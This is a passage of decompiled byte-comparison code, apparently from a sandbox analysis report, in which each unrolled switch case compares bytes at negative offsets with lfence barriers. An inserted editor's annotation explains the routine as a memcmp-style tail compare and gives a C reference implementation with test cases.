                                      								__ecx = 0 | __edi > 0x00000000;
                                      								__ecx = (__edi > 0) * 2 - 1;
                                      								goto L246;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x11) & 0x000000ff;
                                      							__eax =  *(__edx - 0x11) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x11) & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								goto L242;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x10) & 0x000000ff;
                                      							__eax =  *(__edx - 0x10) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi == 0) {
                                      								asm("lfence");
                                      								__ecx =  *(__esi - 0xf) & 0x000000ff;
                                      								__eax =  *(__edx - 0xf) & 0x000000ff;
                                      								__ecx = ( *(__esi - 0xf) & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									__eax = 0;
                                      									__eflags = __ecx;
                                      									__eax = 0 | __ecx > 0x00000000;
                                      									__ecx = (__ecx > 0) * 2 - 1;
                                      								}
                                      								goto L246;
                                      							}
                                      							goto L242;
                                      						case 0x13:
                                      							L303:
                                      							__eax =  *(__esi - 0x13);
                                      							__eflags =  *(__esi - 0x13) -  *(__edx - 0x13);
                                      							if( *(__esi - 0x13) ==  *(__edx - 0x13)) {
                                      								__ecx = 0;
                                      								__eflags = 0;
                                      								L311:
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									goto L145;
                                      								}
                                      								goto L312;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x13) & 0x000000ff;
                                      							__eax =  *(__edx - 0x13) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								L307:
                                      								__ecx = 0;
                                      								__eflags = __edi;
                                      								__ecx = 0 | __edi > 0x00000000;
                                      								__ecx = (__edi > 0) * 2 - 1;
                                      								goto L311;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x12) & 0x000000ff;
                                      							__eax =  *(__edx - 0x12) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x12) & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								goto L307;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x11) & 0x000000ff;
                                      							__eax =  *(__edx - 0x11) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x11) & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi == 0) {
                                      								asm("lfence");
                                      								__ecx =  *(__esi - 0x10) & 0x000000ff;
                                      								__eax =  *(__edx - 0x10) & 0x000000ff;
                                      								__ecx = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									__eax = 0;
                                      									__eflags = __ecx;
                                      									__eax = 0 | __ecx > 0x00000000;
                                      									__ecx = (__ecx > 0) * 2 - 1;
                                      								}
                                      								goto L311;
                                      							}
                                      							goto L307;
                                      						case 0x14:
                                      							L99:
                                      							if( *(_t942 - 0x14) ==  *(_t872 - 0x14)) {
                                      								_t820 = 0;
                                      								__eflags = 0;
                                      								L107:
                                      								if(_t820 != 0) {
                                      									goto L145;
                                      								}
                                      								goto L108;
                                      							}
                                      							asm("lfence");
                                      							_t892 = ( *(_t942 - 0x14) & 0x000000ff) - ( *(_t872 - 0x14) & 0x000000ff);
                                      							if(_t892 != 0) {
                                      								L103:
                                      								_t820 = (0 | _t892 > 0x00000000) * 2 - 1;
                                      								goto L107;
                                      							}
                                      							asm("lfence");
                                      							_t892 = ( *(_t942 - 0x13) & 0x000000ff) - ( *(_t872 - 0x13) & 0x000000ff);
                                      							if(_t892 != 0) {
                                      								goto L103;
                                      							}
                                      							asm("lfence");
                                      							_t892 = ( *(_t942 - 0x12) & 0x000000ff) - ( *(_t872 - 0x12) & 0x000000ff);
                                      							if(_t892 == 0) {
                                      								asm("lfence");
                                      								_t820 = ( *(_t942 - 0x11) & 0x000000ff) - ( *(_t872 - 0x11) & 0x000000ff);
                                      								__eflags = _t820;
                                      								if(_t820 != 0) {
                                      									__eflags = _t820;
                                      									_t820 = (0 | _t820 > 0x00000000) * 2 - 1;
                                      								}
                                      								goto L107;
                                      							}
                                      							goto L103;
                                      						case 0x15:
                                      							L164:
                                      							__eax =  *(__esi - 0x15);
                                      							__eflags =  *(__esi - 0x15) -  *(__edx - 0x15);
                                      							if( *(__esi - 0x15) ==  *(__edx - 0x15)) {
                                      								__ecx = 0;
                                      								__eflags = 0;
                                      								L172:
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									goto L145;
                                      								}
                                      								goto L173;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x15) & 0x000000ff;
                                      							__eax =  *(__edx - 0x15) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x15) & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								L168:
                                      								__ecx = 0;
                                      								__eflags = __edi;
                                      								__ecx = 0 | __edi > 0x00000000;
                                      								__ecx = (__edi > 0) * 2 - 1;
                                      								goto L172;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x14) & 0x000000ff;
                                      							__eax =  *(__edx - 0x14) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								goto L168;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x13) & 0x000000ff;
                                      							__eax =  *(__edx - 0x13) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi == 0) {
                                      								asm("lfence");
                                      								__ecx =  *(__esi - 0x12) & 0x000000ff;
                                      								__eax =  *(__edx - 0x12) & 0x000000ff;
                                      								__ecx = ( *(__esi - 0x12) & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									__eax = 0;
                                      									__eflags = __ecx;
                                      									__eax = 0 | __ecx > 0x00000000;
                                      									__ecx = (__ecx > 0) * 2 - 1;
                                      								}
                                      								goto L172;
                                      							}
                                      							goto L168;
                                      						case 0x16:
                                      							L229:
                                      							__eax =  *(__esi - 0x16);
                                      							__eflags =  *(__esi - 0x16) -  *(__edx - 0x16);
                                      							if( *(__esi - 0x16) ==  *(__edx - 0x16)) {
                                      								__ecx = 0;
                                      								__eflags = 0;
                                      								L237:
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									goto L145;
                                      								}
                                      								goto L238;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x16) & 0x000000ff;
                                      							__eax =  *(__edx - 0x16) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x16) & 0x000000ff) - ( *(__edx - 0x16) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								L233:
                                      								__ecx = 0;
                                      								__eflags = __edi;
                                      								__ecx = 0 | __edi > 0x00000000;
                                      								__ecx = (__edi > 0) * 2 - 1;
                                      								goto L237;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x15) & 0x000000ff;
                                      							__eax =  *(__edx - 0x15) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x15) & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								goto L233;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x14) & 0x000000ff;
                                      							__eax =  *(__edx - 0x14) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi == 0) {
                                      								asm("lfence");
                                      								__ecx =  *(__esi - 0x13) & 0x000000ff;
                                      								__eax =  *(__edx - 0x13) & 0x000000ff;
                                      								__ecx = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									__eax = 0;
                                      									__eflags = __ecx;
                                      									__eax = 0 | __ecx > 0x00000000;
                                      									__ecx = (__ecx > 0) * 2 - 1;
                                      								}
                                      								goto L237;
                                      							}
                                      							goto L233;
                                      						case 0x17:
                                      							L294:
                                      							__eax =  *(__esi - 0x17);
                                      							__eflags =  *(__esi - 0x17) -  *(__edx - 0x17);
                                      							if( *(__esi - 0x17) ==  *(__edx - 0x17)) {
                                      								__ecx = 0;
                                      								__eflags = 0;
                                      								L302:
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									goto L145;
                                      								}
                                      								goto L303;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x17) & 0x000000ff;
                                      							__eax =  *(__edx - 0x17) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x17) & 0x000000ff) - ( *(__edx - 0x17) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								L298:
                                      								__ecx = 0;
                                      								__eflags = __edi;
                                      								__ecx = 0 | __edi > 0x00000000;
                                      								__ecx = (__edi > 0) * 2 - 1;
                                      								goto L302;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x16) & 0x000000ff;
                                      							__eax =  *(__edx - 0x16) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x16) & 0x000000ff) - ( *(__edx - 0x16) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								goto L298;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x15) & 0x000000ff;
                                      							__eax =  *(__edx - 0x15) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x15) & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi == 0) {
                                      								asm("lfence");
                                      								__ecx =  *(__esi - 0x14) & 0x000000ff;
                                      								__eax =  *(__edx - 0x14) & 0x000000ff;
                                      								__ecx = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									__eax = 0;
                                      									__eflags = __ecx;
                                      									__eax = 0 | __ecx > 0x00000000;
                                      									__ecx = (__ecx > 0) * 2 - 1;
                                      								}
                                      								goto L302;
                                      							}
                                      							goto L298;
                                      						case 0x18:
                                      							L90:
                                      							if( *(_t942 - 0x18) ==  *(_t872 - 0x18)) {
                                      								_t820 = 0;
                                      								__eflags = 0;
                                      								L98:
                                      								if(_t820 != 0) {
                                      									goto L145;
                                      								}
                                      								goto L99;
                                      							}
                                      							asm("lfence");
                                      							_t896 = ( *(_t942 - 0x18) & 0x000000ff) - ( *(_t872 - 0x18) & 0x000000ff);
                                      							if(_t896 != 0) {
                                      								L94:
                                      								_t820 = (0 | _t896 > 0x00000000) * 2 - 1;
                                      								goto L98;
                                      							}
                                      							asm("lfence");
                                      							_t896 = ( *(_t942 - 0x17) & 0x000000ff) - ( *(_t872 - 0x17) & 0x000000ff);
                                      							if(_t896 != 0) {
                                      								goto L94;
                                      							}
                                      							asm("lfence");
                                      							_t896 = ( *(_t942 - 0x16) & 0x000000ff) - ( *(_t872 - 0x16) & 0x000000ff);
                                      							if(_t896 == 0) {
                                      								asm("lfence");
                                      								_t820 = ( *(_t942 - 0x15) & 0x000000ff) - ( *(_t872 - 0x15) & 0x000000ff);
                                      								__eflags = _t820;
                                      								if(_t820 != 0) {
                                      									__eflags = _t820;
                                      									_t820 = (0 | _t820 > 0x00000000) * 2 - 1;
                                      								}
                                      								goto L98;
                                      							}
                                      							goto L94;
                                      						case 0x19:
                                      							L155:
                                      							__eax =  *(__esi - 0x19);
                                      							__eflags =  *(__esi - 0x19) -  *(__edx - 0x19);
                                      							if( *(__esi - 0x19) ==  *(__edx - 0x19)) {
                                      								__ecx = 0;
                                      								__eflags = 0;
                                      								L163:
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									goto L145;
                                      								}
                                      								goto L164;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x19) & 0x000000ff;
                                      							__eax =  *(__edx - 0x19) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x19) & 0x000000ff) - ( *(__edx - 0x19) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								L159:
                                      								__ecx = 0;
                                      								__eflags = __edi;
                                      								__ecx = 0 | __edi > 0x00000000;
                                      								__ecx = (__edi > 0) * 2 - 1;
                                      								goto L163;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x18) & 0x000000ff;
                                      							__eax =  *(__edx - 0x18) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x18) & 0x000000ff) - ( *(__edx - 0x18) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								goto L159;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x17) & 0x000000ff;
                                      							__eax =  *(__edx - 0x17) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x17) & 0x000000ff) - ( *(__edx - 0x17) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi == 0) {
                                      								asm("lfence");
                                      								__ecx =  *(__esi - 0x16) & 0x000000ff;
                                      								__eax =  *(__edx - 0x16) & 0x000000ff;
                                      								__ecx = ( *(__esi - 0x16) & 0x000000ff) - ( *(__edx - 0x16) & 0x000000ff);
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									__eax = 0;
                                      									__eflags = __ecx;
                                      									__eax = 0 | __ecx > 0x00000000;
                                      									__ecx = (__ecx > 0) * 2 - 1;
                                      								}
                                      								goto L163;
                                      							}
                                      							goto L159;
                                      						case 0x1a:
                                      							L220:
                                      							__eax =  *(__esi - 0x1a);
                                      							__eflags =  *(__esi - 0x1a) -  *(__edx - 0x1a);
                                      							if( *(__esi - 0x1a) ==  *(__edx - 0x1a)) {
                                      								__ecx = 0;
                                      								__eflags = 0;
                                      								L228:
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									goto L145;
                                      								}
                                      								goto L229;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x1a) & 0x000000ff;
                                      							__eax =  *(__edx - 0x1a) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								L224:
                                      								__ecx = 0;
                                      								__eflags = __edi;
                                      								__ecx = 0 | __edi > 0x00000000;
                                      								__ecx = (__edi > 0) * 2 - 1;
                                      								goto L228;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x19) & 0x000000ff;
                                      							__eax =  *(__edx - 0x19) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x19) & 0x000000ff) - ( *(__edx - 0x19) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								goto L224;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x18) & 0x000000ff;
                                      							__eax =  *(__edx - 0x18) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x18) & 0x000000ff) - ( *(__edx - 0x18) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi == 0) {
                                      								asm("lfence");
                                      								__ecx =  *(__esi - 0x17) & 0x000000ff;
                                      								__eax =  *(__edx - 0x17) & 0x000000ff;
                                      								__ecx = ( *(__esi - 0x17) & 0x000000ff) - ( *(__edx - 0x17) & 0x000000ff);
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									__eax = 0;
                                      									__eflags = __ecx;
                                      									__eax = 0 | __ecx > 0x00000000;
                                      									__ecx = (__ecx > 0) * 2 - 1;
                                      								}
                                      								goto L228;
                                      							}
                                      							goto L224;
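Annotation added by the editor at this case boundary (the C below is an illustration written for this page, not code from the Joe Sandbox report or from the sample). Every `case 0xNN` in this switch does the same thing: compare one 4-byte word at the same negative offset from `esi` and `edx`, fall back to a byte-by-byte compare of those four bytes only when the words differ, collapse the first non-zero difference to -1 or +1 with `(diff > 0) * 2 - 1`, and then chain to the case four bytes closer to the end (0x1b -> 0x17 -> 0x13, 0x1a -> 0x16 -> 0x12, 0x19 -> 0x15 -> 0x11, 0x18 -> 0x14 -> 0x10). The `& 0x000000ff` masks make the byte compare unsigned, and each data-dependent branch is followed by `lfence`. Reading this as a compiler-unrolled `memcmp`-style tail compare with speculation barriers is the editor's interpretation; the report itself does not name the routine. The reference implementation below reproduces that contract so its results can be checked against libc `memcmp` on constructed inputs. The barrier macro, the `SAMPLE_*` buffers and the `demo_*` helpers are assumptions of the example, not anything recovered from the sample.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for the asm("lfence") after each data-dependent branch in the listing.
 * Assumption: GCC/Clang on x86; on any other target it degrades to a no-op. */
#if (defined(__GNUC__) || defined(__clang__)) && (defined(__x86_64__) || defined(__i386__))
#define SPECULATION_BARRIER() __asm__ __volatile__("lfence" ::: "memory")
#else
#define SPECULATION_BARRIER() ((void)0)
#endif

/* "(diff > 0) * 2 - 1": a non-zero difference becomes +1 or -1. */
static int sign_of_difference(int diff)
{
    return (diff > 0) * 2 - 1;
}

/*
 * Compare the last n bytes of two buffers given pointers to their END, the way
 * the listing indexes esi/edx with negative offsets (0x1b, 0x17, ... back from
 * the end). Bytes are compared as unsigned, matching the "& 0x000000ff" masks.
 * Returns -1, 0 or +1.
 */
int compare_tail(const unsigned char *a_end, const unsigned char *b_end, size_t n)
{
    size_t back = n;                      /* how far back from the end we are */

    /* One 4-byte chunk per "case": word compare first, bytes only on mismatch. */
    while (back >= 4) {
        const unsigned char *pa = a_end - back;
        const unsigned char *pb = b_end - back;
        uint32_t wa, wb;
        memcpy(&wa, pa, sizeof wa);
        memcpy(&wb, pb, sizeof wb);
        if (wa != wb) {
            SPECULATION_BARRIER();
            for (size_t i = 0; i < 4; i++) {
                int diff = (int)pa[i] - (int)pb[i];
                if (diff != 0)
                    return sign_of_difference(diff);
                SPECULATION_BARRIER();
            }
        }
        back -= 4;
    }

    /* Remaining 1..3 bytes, one per step. */
    while (back > 0) {
        int diff = (int)a_end[-(ptrdiff_t)back] - (int)b_end[-(ptrdiff_t)back];
        if (diff != 0)
            return sign_of_difference(diff);
        back--;
    }
    return 0;
}

/* memcmp-style entry point: pointers to the START of both buffers. */
int tail_memcmp(const void *a, const void *b, size_t n)
{
    const unsigned char *pa = (const unsigned char *)a;
    const unsigned char *pb = (const unsigned char *)b;
    return compare_tail(pa + n, pb + n, n);
}

/* Constructed sample inputs (not from the report). 27 bytes matches case 0x1b. */
static const unsigned char SAMPLE_A[27] = "abcdefghijklmnopqrstuvwxyz";
static const unsigned char SAMPLE_B[27] = "abcdefghijklmnopqrstuvwxyZ";  /* byte 25 differs */

int demo_equal(void)
{
    return tail_memcmp(SAMPLE_A, SAMPLE_A, 27);            /* 0 */
}

int demo_late_mismatch(void)
{
    return tail_memcmp(SAMPLE_A, SAMPLE_B, 27);            /* +1: 'z' (0x7a) > 'Z' (0x5a) */
}

int demo_mid_word_mismatch(void)
{
    const unsigned char x[4] = { 1, 2, 3, 4 };
    const unsigned char y[4] = { 1, 2, 9, 4 };             /* word differs, first diff at byte 2 */
    return tail_memcmp(x, y, 4);                           /* -1 */
}

int demo_unsigned_bytes(void)
{
    const unsigned char hi[1] = { 0xff }, lo[1] = { 0x01 };
    return tail_memcmp(hi, lo, 1);                         /* +1 like memcmp; a signed compare would give -1 */
}

/* 1 when the sign agrees with libc memcmp on the sample pair, else 0. */
int demo_agrees_with_libc(void)
{
    int ours = tail_memcmp(SAMPLE_A, SAMPLE_B, 27);
    int libc = memcmp(SAMPLE_A, SAMPLE_B, 27);
    return (ours > 0) == (libc > 0) && (ours < 0) == (libc < 0);
}

int main(void)
{
    printf("equal=%d late=%d mid=%d unsigned=%d libc_agrees=%d\n",
           demo_equal(), demo_late_mismatch(), demo_mid_word_mismatch(),
           demo_unsigned_bytes(), demo_agrees_with_libc());
    return 0;
}
```

The `demo_unsigned_bytes` case is the one worth remembering when triaging a listing like this: because each byte is zero-extended before the subtraction, 0xff sorts after 0x01, exactly as `memcmp` specifies, so a routine with this shape is a plain ordering compare and not evidence of a cryptographic primitive on its own.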
                                      						case 0x1b:
                                      							L285:
                                      							__eax =  *(__esi - 0x1b);
                                      							__eflags =  *(__esi - 0x1b) -  *(__edx - 0x1b);
                                      							if( *(__esi - 0x1b) ==  *(__edx - 0x1b)) {
                                      								__ecx = 0;
                                      								__eflags = 0;
                                      								L293:
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									goto L145;
                                      								}
                                      								goto L294;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x1b) & 0x000000ff;
                                      							__eax =  *(__edx - 0x1b) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								L289:
                                      								__ecx = 0;
                                      								__eflags = __edi;
                                      								__ecx = 0 | __edi > 0x00000000;
                                      								__ecx = (__edi > 0) * 2 - 1;
                                      								goto L293;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x1a) & 0x000000ff;
                                      							__eax =  *(__edx - 0x1a) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								goto L289;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x19) & 0x000000ff;
                                      							__eax =  *(__edx - 0x19) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x19) & 0x000000ff) - ( *(__edx - 0x19) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi == 0) {
                                      								asm("lfence");
                                      								__ecx =  *(__esi - 0x18) & 0x000000ff;
                                      								__eax =  *(__edx - 0x18) & 0x000000ff;
                                      								__ecx = ( *(__esi - 0x18) & 0x000000ff) - ( *(__edx - 0x18) & 0x000000ff);
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									__eax = 0;
                                      									__eflags = __ecx;
                                      									__eax = 0 | __ecx > 0x00000000;
                                      									__ecx = (__ecx > 0) * 2 - 1;
                                      								}
                                      								goto L293;
                                      							}
                                      							goto L289;
                                      						case 0x1c:
                                      							if( *(_t942 - 0x1c) ==  *(_t872 - 0x1c)) {
                                      								_t820 = 0;
                                      								__eflags = 0;
                                      								L89:
                                      								if(_t820 != 0) {
                                      									goto L145;
                                      								}
                                      								goto L90;
                                      							}
                                      							asm("lfence");
                                      							_t900 = ( *(_t942 - 0x1c) & 0x000000ff) - ( *(_t872 - 0x1c) & 0x000000ff);
                                      							if(_t900 != 0) {
                                      								L85:
                                      								_t820 = (0 | _t900 > 0x00000000) * 2 - 1;
                                      								goto L89;
                                      							}
                                      							asm("lfence");
                                      							_t900 = ( *(_t942 - 0x1b) & 0x000000ff) - ( *(_t872 - 0x1b) & 0x000000ff);
                                      							if(_t900 != 0) {
                                      								goto L85;
                                      							}
                                      							asm("lfence");
                                      							_t900 = ( *(_t942 - 0x1a) & 0x000000ff) - ( *(_t872 - 0x1a) & 0x000000ff);
                                      							if(_t900 == 0) {
                                      								asm("lfence");
                                      								_t820 = ( *(_t942 - 0x19) & 0x000000ff) - ( *(_t872 - 0x19) & 0x000000ff);
                                      								__eflags = _t820;
                                      								if(_t820 != 0) {
                                      									__eflags = _t820;
                                      									_t820 = (0 | _t820 > 0x00000000) * 2 - 1;
                                      								}
                                      								goto L89;
                                      							}
                                      							goto L85;
                                      						case 0x1d:
                                      							__eax =  *(__esi - 0x1d);
                                      							__eflags =  *(__esi - 0x1d) -  *(__edx - 0x1d);
                                      							if( *(__esi - 0x1d) ==  *(__edx - 0x1d)) {
                                      								__ecx = 0;
                                      								__eflags = 0;
                                      								L154:
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									goto L145;
                                      								}
                                      								goto L155;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x1d) & 0x000000ff;
                                      							__eax =  *(__edx - 0x1d) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								L150:
                                      								__ecx = 0;
                                      								__eflags = __edi;
                                      								__ecx = 0 | __edi > 0x00000000;
                                      								__ecx = (__edi > 0) * 2 - 1;
                                      								goto L154;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x1c) & 0x000000ff;
                                      							__eax =  *(__edx - 0x1c) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								goto L150;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x1b) & 0x000000ff;
                                      							__eax =  *(__edx - 0x1b) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi == 0) {
                                      								asm("lfence");
                                      								__ecx =  *(__esi - 0x1a) & 0x000000ff;
                                      								__eax =  *(__edx - 0x1a) & 0x000000ff;
                                      								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									__eax = 0;
                                      									__eflags = __ecx;
                                      									__eax = 0 | __ecx > 0x00000000;
                                      									__ecx = (__ecx > 0) * 2 - 1;
                                      								}
                                      								goto L154;
                                      							}
                                      							goto L150;
                                      						case 0x1e:
                                      							__eax =  *(__esi - 0x1e);
                                      							__eflags =  *(__esi - 0x1e) -  *(__edx - 0x1e);
                                      							if( *(__esi - 0x1e) ==  *(__edx - 0x1e)) {
                                      								__ecx = 0;
                                      								__eflags = 0;
                                      								L219:
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									goto L145;
                                      								}
                                      								goto L220;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x1e) & 0x000000ff;
                                      							__eax =  *(__edx - 0x1e) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								L215:
                                      								__ecx = 0;
                                      								__eflags = __edi;
                                      								__ecx = 0 | __edi > 0x00000000;
                                      								__ecx = (__edi > 0) * 2 - 1;
                                      								goto L219;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x1d) & 0x000000ff;
                                      							__eax =  *(__edx - 0x1d) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								goto L215;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x1c) & 0x000000ff;
                                      							__eax =  *(__edx - 0x1c) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi == 0) {
                                      								asm("lfence");
                                      								__ecx =  *(__esi - 0x1b) & 0x000000ff;
                                      								__eax =  *(__edx - 0x1b) & 0x000000ff;
                                      								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									__eax = 0;
                                      									__eflags = __ecx;
                                      									__eax = 0 | __ecx > 0x00000000;
                                      									__ecx = (__ecx > 0) * 2 - 1;
                                      								}
                                      								goto L219;
                                      							}
                                      							goto L215;
                                      						case 0x1f:
                                      							__eax =  *(__esi - 0x1f);
                                      							__eflags =  *(__esi - 0x1f) -  *(__edx - 0x1f);
                                      							if( *(__esi - 0x1f) ==  *(__edx - 0x1f)) {
                                      								__ecx = 0;
                                      								__eflags = 0;
                                      								L284:
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									goto L145;
                                      								}
                                      								goto L285;
                                      							}
                                      							asm("lfence");
                                      							__eax =  *(__edx - 0x1f) & 0x000000ff;
                                      							__edi =  *(__esi - 0x1f) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								L280:
                                      								__ecx = 0;
                                      								__eflags = __edi;
                                      								__ecx = 0 | __edi > 0x00000000;
                                      								__ecx = (__edi > 0) * 2 - 1;
                                      								goto L284;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x1e) & 0x000000ff;
                                      							__eax =  *(__edx - 0x1e) & 0x000000ff;
